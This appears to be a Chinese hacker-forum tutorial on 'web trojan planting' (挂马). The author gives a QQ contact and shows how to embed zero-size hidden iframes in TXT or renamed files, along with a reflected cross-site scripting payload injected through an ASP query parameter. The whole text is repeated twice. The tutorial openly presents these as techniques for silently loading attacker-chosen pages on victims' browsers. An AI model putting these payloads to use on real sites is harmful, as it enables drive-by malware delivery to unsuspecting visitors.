主题:另类网页挂马思路
我是棒棒 QQ:405799855
QQ群: 29182422(已满) 23849177
OK. Let’s start!
原理很简单,其实在TXT里写入HTM代码同样可以访问网站,呵呵!
可能老鸟们早就知道了!
代码1:(图片)
<html>
<img src=http://www.lf328.com/skin/1/0124.jpg>
<iframe src="http://www.baidu.com/" width="0" height="0" frameborder="0"></iframe>
</html>
OK,我们来打开看看 可能速度太快大家没看到,我来调整下长宽
看到了吧? 呵呵 我是为了方便大家观看才把长宽设置成500,大家挂马给设置成0,0
代码2:(文字)
OK,测试成功
<html>
<iframe src="http://www.****.com/" width="0" height="0" frameborder="0"></iframe>
</html>
变化后缀同样可以访问exe,jpg,gif,rar
其实这跟啊拉收信的asp跨站攻击一个道理
dqhx.asp?num=<script>window.open("http://www.baidu.com/");</script>
这句话代码意思就是把<script>window.open("http://www.baidu.com/");</script>写入收信的TXT
我是棒棒 QQ:405799855
QQ群: 29182422(已满) 23849177
OK. Let’s start!
原理很简单,其实在TXT里写入HTM代码同样可以访问网站,呵呵!
可能老鸟们早就知道了!
代码1:(图片)
<html>
<img src=http://www.lf328.com/skin/1/0124.jpg>
<iframe src="http://www.baidu.com/" width="0" height="0" frameborder="0"></iframe>
</html>
OK,我们来打开看看 可能速度太快大家没看到,我来调整下长宽
看到了吧? 呵呵 我是为了方便大家观看才把长宽设置成500,大家挂马给设置成0,0
代码2:(文字)
OK,测试成功
<html>
<iframe src="http://www.****.com/" width="0" height="0" frameborder="0"></iframe>
</html>
变化后缀同样可以访问exe,jpg,gif,rar
其实这跟啊拉收信的asp跨站攻击一个道理
dqhx.asp?num=<script>window.open("http://www.baidu.com/");</script>
这句话代码意思就是把<script>window.open("http://www.baidu.com/");</script>写入收信的TXT


